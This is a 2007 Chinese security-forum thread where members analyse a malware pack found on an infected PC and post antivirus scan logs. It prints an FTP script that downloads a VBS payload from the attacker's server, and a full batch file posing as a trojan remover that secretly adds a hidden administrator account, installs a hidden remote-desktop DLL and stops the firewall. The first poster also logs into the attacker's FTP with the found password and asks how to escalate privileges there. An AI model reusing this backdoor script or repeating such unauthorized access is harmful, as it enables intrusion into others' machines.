反向捕获 FTP 中的所有马，哈哈...大家也来研究一下

Cloud018

刚刚发现多了两个进程，wscript.exe 和 cmd.exe，就知道不对了...立即查查它们的命令行，结果发现，命令行为：
C:\windows\system32\wscript.exe C:\run.vbs
C:\windows\system32\cmd.exe C:\ff.bat
结束进程后，在 C:\ 找到4个文件：run.vbs、ff.bat、a.bat、gz
用 notepad.exe 打开 gz，里面的内容为：
=====================
open XX.XXX.XX.XXX
123
123
binary
get 1.vbs c:\aa.vbs
bye
=====================
高兴啊！看来这个 FTP 的用户名和密码都是 123
试试看看，果然成功！^_^
为大家带来了N只，哈，慢慢玩

PS：因为这个 FTP 设置了权限，不能更改文件、创建文件和更改密码，郁闷...如果谁知道 FTP 提权的方法，请指教一下小弟...

红心王子

江民杀毒软件报告文件

        北京江民新科技术有限公司

        扫描引擎 11.00.700
        病毒库日期 2007-08-23
        更新日期 2007-08-24

扫描目标 C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\

开始时间 2007-08-24 09:47:15

在 C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\sxcz1314-3344.exe 中发现 Backdoor/Huigezi.2007.tux 病毒, 已删除
在 C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\onlinek-ip03.exe 中发现 Backdoor/Huigezi.2007.ifm 病毒, 已删除
在 C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\3-8004.exe 中发现 Backdoor/Huigezi.2007.gzu 病毒, 已删除
在 C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\3-8005.exe 中发现 Backdoor/Huigezi.2007.gzu 病毒, 已删除
在 C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\5-8005.exe 中发现 Backdoor/Huigezi.2007.gzu 病毒, 已删除
在 C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\07-5-8003.exe 中发现 Backdoor/Huigezi.2007.abfr 病毒, 已删除
在 C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\135.exe 中发现 Backdoor/Huigezi.2007.gzu 病毒, 已删除
在 C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\anniu.exe 中发现 TrojanDownloader.Small.hpj 病毒, 已删除
在 C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\7788.exe->aio.exe 中发现 Trojan/PSW.GamePass.szb 病毒, 已删除
在 C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\7788.exe->ipseccmd.exe 中发现 Trojan/PSW.GamePass.szc 病毒, 已删除
在 C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\down.exe 中发现 Backdoor/Agent.rqk 病毒, 已删除
在 C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\gz.exe 中发现 Backdoor/Agent.rqk 病毒, 已删除
正常结束。

扫描结果:
                 文件数 :492                                 病毒体 :12        
                   删除 :12                                    解毒 :0         
    扫描速度(千字节/秒) :7949                              扫描时间 :00:00:16
    扫描文件速度(个/秒) :30

Cloud018

看来矛头指向卡巴咯，卡巴6 只捉到 2 个

2007-8-24 9:47:51        文件: C:\Documents and Settings\SYSTEM\桌面\1.vbs        ok        已扫描
2007-8-24 9:47:55        文件: C:\Documents and Settings\SYSTEM\桌面\135.exe        ok        已扫描
2007-8-24 9:47:50        文件: C:\Documents and Settings\SYSTEM\桌面\07-5-8003.exe        ok        已扫描
2007-8-24 9:48:05        文件: C:\Documents and Settings\SYSTEM\桌面\3-8004.exe        ok        已扫描
2007-8-24 9:48:05        文件: C:\Documents and Settings\SYSTEM\桌面\3-8005.exe        ok        已扫描
2007-8-24 9:48:05        文件: C:\Documents and Settings\SYSTEM\桌面\5-8005.exe        ok        已扫描
2007-8-24 9:48:06        文件: C:\Documents and Settings\SYSTEM\桌面\7788.exe        压缩文件 RarSFX        
2007-8-24 9:48:06        文件: C:\Documents and Settings\SYSTEM\桌面\7788.exe/data.rar        压缩文件 RAR        
2007-8-24 9:48:06        文件: C:\Documents and Settings\SYSTEM\桌面\7788.exe/data.rar\archive comment        ok        已扫描
2007-8-24 9:48:07        文件: C:\Documents and Settings\SYSTEM\桌面\7788.exe/data.rar\xp.bat        ok        已扫描
2007-8-24 9:48:07        文件: C:\Documents and Settings\SYSTEM\桌面\7788.exe/data.rar\1.vbs        ok        已扫描
2007-8-24 9:48:07        文件: C:\Documents and Settings\SYSTEM\桌面\7788.exe/data.rar\aio.exe        ok        已扫描
2007-8-24 9:48:08        文件: C:\Documents and Settings\SYSTEM\桌面\7788.exe/data.rar\ipseccmd.exe        ok        已扫描
2007-8-24 9:48:10        文件: C:\Documents and Settings\SYSTEM\桌面\7788.exe/data.rar\termsrvhack.dll        ok        已扫描
2007-8-24 9:48:16        文件: C:\Documents and Settings\SYSTEM\桌面\7788.exe/data.rar\tskill.EXE        已检测 风险软件 not-a-virus:NetTool.Win32.PsKill.a        
2007-8-24 9:48:16        文件: C:\Documents and Settings\SYSTEM\桌面\7788.exe/data.rar\1.bat        ok        已扫描
2007-8-24 9:48:16        文件: C:\Documents and Settings\SYSTEM\桌面\7788.exe/data.rar\mdb.txt        ok        已扫描
2007-8-24 9:48:16        文件: C:\Documents and Settings\SYSTEM\桌面\anniu.exe        ok        已扫描
2007-8-24 9:48:16        文件: C:\Documents and Settings\SYSTEM\桌面\dos.vnet.8800.exe        ok        已扫描
2007-8-24 9:48:17        文件: C:\Documents and Settings\SYSTEM\桌面\down.exe        已检测 病毒 Virus.Win32.AutoRun.ek        
2007-8-24 9:48:18        文件: C:\Documents and Settings\SYSTEM\桌面\gz.exe        已检测 病毒 Virus.Win32.AutoRun.ek        
2007-8-24 9:48:25        文件: C:\Documents and Settings\SYSTEM\桌面\onlinek-ip03.exe        ok        已扫描
2007-8-24 9:48:53        文件: C:\Documents and Settings\SYSTEM\桌面\sxcz1314-3344.exe        ok        已扫描

看来矛头指向卡巴咯，卡巴6 只捉到 2 个

[ 本帖最后由 Cloud018 于 2007-8-24 09:54 编辑 ]

sbbdms

第一个包卡巴全部不报啊。。。

woai_jolin

2007-8-24 9:49:59        Scanning Log
2007-8-24 9:49:59        Version of virus signature database: 2481 (20070823)
2007-8-24 9:49:59        Date: 24.8.2007  Time: 09:49:59
2007-8-24 9:49:59        Scanned disks, folders and files: F:\v
2007-8-24 9:50:04        F:\v\07-5-8003.exe - probably a variant of Win32/GreyBird trojan - cleaned by deleting - quarantined [1]
2007-8-24 9:51:06        F:\v\7788.exe » RAR » aio.exe - probably a variant of Win32/Genetik trojan
2007-8-24 9:51:07        F:\v\anniu.exe - Win32/PSW.Legendmir.SY trojan - cleaned by deleting - quarantined [1]
2007-8-24 9:51:17        F:\v\dos.vnet.8800.exe - a variant of Win32/PSW.QQRob.NAQ trojan - cleaned by deleting - quarantined [1]
2007-8-24 9:51:19        F:\v\down.exe - a variant of Win32/Delf.NDF worm - cleaned by deleting - quarantined [1]
2007-8-24 9:51:20        F:\v\gz.exe - a variant of Win32/Delf.NDF worm - cleaned by deleting - quarantined [1]
2007-8-24 9:51:24        F:\v\onlinek-ip03.exe - a variant of Win32/Hupigon trojan - cleaned by deleting - quarantined [1]
2007-8-24 9:51:40        Number of scanned files: 43
2007-8-24 9:51:40        Number of threats found: 7
2007-8-24 9:51:40        Time of completion: 09:51:40  Total scanning time: 101 sec (00:01:41)
2007-8-24 9:51:40       
2007-8-24 9:51:40        Notes:
2007-8-24 9:51:40        [1] File has been deleted as it contained only the virus body.

风野胤

第一个包报不报无所谓

Cloud018

原帖由 风野胤 于 2007-8-24 09:52 发表
第一个包报不报无所谓

没有错，最重要是第二包的 EXE 和那个 VBS

风野胤

里面居然还有专杀
晕了

@echo off
@aio -terminal 7788
@net1 user guest 123 /add
@net1 uesr guest 123
@net1 localgroup administrators guest /add
@net1 user guest /active:yes
@aio -clone administrator guest 123
Tasklist/SVC >>1.txt
type 1.txt | find "DcomLaunch" >2.txt
for /f "eol= tokens=1,2 delims= " %%i in (2.txt) do ntsd -c q -p %%j
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%\System32\termsrvhack.dll /f
@copy termsrvhack.dll %SystemRoot%\System32\termsrvhack.dll
@Attrib +H +S +R %SystemRoot%\System32\termsrvhack.dll
@shutdown -a
@shutdown -a
@shutdown -a
@del termsrvhack.dll
@del 1.txt
@del 2.txt
@net stop sharedaccess
@net start dcomlaunch
@net start termservice
@echo Windows Registry Editor Version 5.00>> 1.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>> 1.reg
@echo [-HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>> 1.reg
@regedit /s 1.reg
@del 1.reg
@echo ok >> c:\7788OK.ini
@ATTRIB -R -H -S -A "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\*.*"
@DEL /F /Q /A -R -H -S -A "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\*.*"
@echo::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@echo::删除木马,请稍侯
@echo::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
tskill rundl132.exe
tskill rundll32.exe
tskill logo_1.exe
tskill logo1_.exe
tskill hh.exe
tskill aa.exe
tskill 1.exe
tskill 2.exe
tskill 3.exe
tskill 4.exe
tskill 5.exe
tskill 6.exe
tskill 7.exe
tskill 8.exe
tskill 9.exe
tskill spoclsv.exe
tskill SVCH0ST.exe
tskill svohost.exe
tskill sxs.exe
del %Windir%\MickNew\MickNew.dll
del %Windir%\MH_FILE\MH_DLL.dll
del %Windir%\TODAYZTKING\TODAYZTKING.DLL
del %windir%\system\Logo1_.exe
del %windir%\rundl132.exe
del %windir%\vDll.dll
del %windir%\Dll.dll
del %windir%\1.exe
del %windir%\2.exe
del %windir%\3.exe
del %windir%\4.exe
del %windir%\5.exe
del %windir%\6.exe
del %windir%\7.exe
del %windir%\8.exe
del %windir%\9.exe
del %windir%\SVCH0ST.exe
del %windir%\logo_1.exe
del %windir%\svohost.exe
@echo::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@echo::清除灰鸽子和上兴等木马程序，请稍侯.......
@echo::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@aio -EnumService Stopped > info.txt
@for /f "eol= tokens=1 delims= " %%i in (mdb.txt) do find /i "%%i" info.txt >>muma.txt
@for /f "eol=- tokens=4 delims= " %%i in (muma.txt) do sc config %%i start= disabled
@for /f "eol=- tokens=4 delims= " %%i in (muma.txt) do sc delete %%i
@for /f "eol=- tokens=4 delims= " %%i in (muma.txt) do sc config %%i start= disabled
@for /f "eol=- tokens=4 delims= " %%i in (muma.txt) do sc delete %%i
@del info.txt
@del muma.txt
@echo::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@echo::恢复注册表中不给设置显示隐藏文件的项目,请稍侯
@echo::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
echo Windows Registry Editor Version 5.00> delshare.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]>> delshare.reg
echo "RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced">> delshare.reg
echo "Text"="@shell32.dll,-30500">> delshare.reg
echo "Type"="radio">> delshare.reg
echo "CheckedValue"=dword:00000001>> delshare.reg
echo "ValueName"="Hidden">> delshare.reg
echo "DefaultValue"=dword:00000002>> delshare.reg
echo "HKeyRoot"=dword:80000001>> delshare.reg
echo "HelpID"="shell.hlp#51105">> delshare.reg
regedit /s delshare.reg
del delshare.reg
echo Windows Registry Editor Version 5.00> cc.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]>> cc.reg
echo "DebugOptions"="2048">> cc.reg
echo "Documents"="">> cc.reg
echo "DosPrint"="no">> cc.reg
echo "load"=->> cc.reg
echo "NetMessage"="no">> cc.reg
echo "NullPort"="None">> cc.reg
echo "programs"="com exe bat pif cmd">> cc.reg
echo "Device"="">> cc.reg
regedit /s cc.reg
del cc.reg
@echo::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@echo::删除每个分区下的SXS.EXE和AUTORUN.INF文件，请稍侯.......
@echo::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
FOR %%a IN ( C: D: E: F: G: H: ) DO ATTRIB -R -H -S -A %%a\SXS.EXE & DEL /F /Q /A -R -H -S -A %%a\SXS.EXE & ATTRIB -R -H -S -A %%a\setup.exe & DEL /F /Q /A -R -H -S -A %%a\setup.exe & ATTRIB -R -H -S -A %%a\system.exe & DEL /F /Q /A -R -H -S -A %%a\system.exe & ATTRIB -R -H -S -A %%a\rose.exe & DEL /F /Q /A -R -H -S -A %%a\rose.exe & ATTRIB -R -H -S -A %%a\AUTORUN.INF & DEL /F /Q /A -R -H -S -A %%a\AUTORUN.INF

@echo::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@echo::关闭有害端口，请稍侯.......
@echo::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
ipseccmd  -w REG -p "HFUT_SECU" -r "Block UDP/137" -f *+0:137:UDP -n BLOCK -x
ipseccmd  -w REG -p "HFUT_SECU" -r "Block UDP/138" -f *+0:138:UDP -n BLOCK -x
ipseccmd  -w REG -p "HFUT_SECU" -r "Block TCP/139" -f *+0:139:TCP -n BLOCK -x
ipseccmd  -w REG -p "HFUT_SECU" -r "Block TCP/135" -f *+0:135:TCP -n BLOCK -x
ipseccmd  -w REG -p "HFUT_SECU" -r "Block UDP/135" -f *+0:135:UDP -n BLOCK -x
net share c$ /del
net share d$ /del
net share e$ /del
net share f$ /del
net share admin$ /del
net share ipc$ /del
@del 1.vbs
@del c:\boot.exe
@del c:\ghost.exe
@aio -reboot
@aio -reboot && del 1.bat
@exit

碧水寒潭

Start of the scan: 2007年8月24日  09:55

Starting the file scan:

Begin scan in 'H:\AV-TEST'
H:\AV-TEST\N个[1].part1.rar
  [0] Archive type: RAR
  --> onlinek-ip03.exe
      [DETECTION] Contains a signature of the (dangerous) backdoor program BDS/Hupigon.Gen Backdoor server programs
      [INFO]      The file was deleted!
H:\AV-TEST\N个[1].part2.rar
  [0] Archive type: RAR
  --> 3-8004.exe
      [DETECTION] Contains a signature of the (dangerous) backdoor program BDS/Hupigon.Gen Backdoor server programs
      [INFO]      The file was deleted!
H:\AV-TEST\N个[1].part3.rar
  [0] Archive type: RAR
  --> 5-8005.exe
      [DETECTION] Contains a signature of the (dangerous) backdoor program BDS/Hupigon.Gen Backdoor server programs
      [INFO]      The file was deleted!
H:\AV-TEST\N个[1].part4.rar
  [0] Archive type: RAR
  --> 135.exe
      [DETECTION] Contains a signature of the (dangerous) backdoor program BDS/Hupigon.Gen Backdoor server programs
      [INFO]      The file was deleted!
H:\AV-TEST\N个[1].part5.rar
  [0] Archive type: RAR
  --> anniu.exe
      [DETECTION] Is the Trojan horse TR/Dldr.Anskya.A.1
  --> dos.vnet.8800.exe
      [DETECTION] Is the Trojan horse TR/Crypt.FKM.Gen
  --> down.exe
      [DETECTION] Contains suspicious code HEUR/Crypted
  --> gz.exe
      [DETECTION] Contains suspicious code HEUR/Crypted
      [INFO]      The file was deleted!


End of the scan: 2007年8月24日  09:55
Used time: 00:33 min

The scan has been done completely.

      1 Scanning directories
     23 Files were scanned
      8 viruses and/or unwanted programs were found
      2 classified as suspicious:
      5 files were deleted
      0 files were repaired
      0 files were moved to quarantine
      0 files were renamed
      0 Files cannot be scanned
     13 Files not concerned
      6 Archives were scanned
      0 Warnings
      0 Notes
      0 Hidden objects were found

solcroft

这个专杀有问题
怎么拷贝个隐藏dll到system32目录下然后假装删除
还偷偷加了个admin account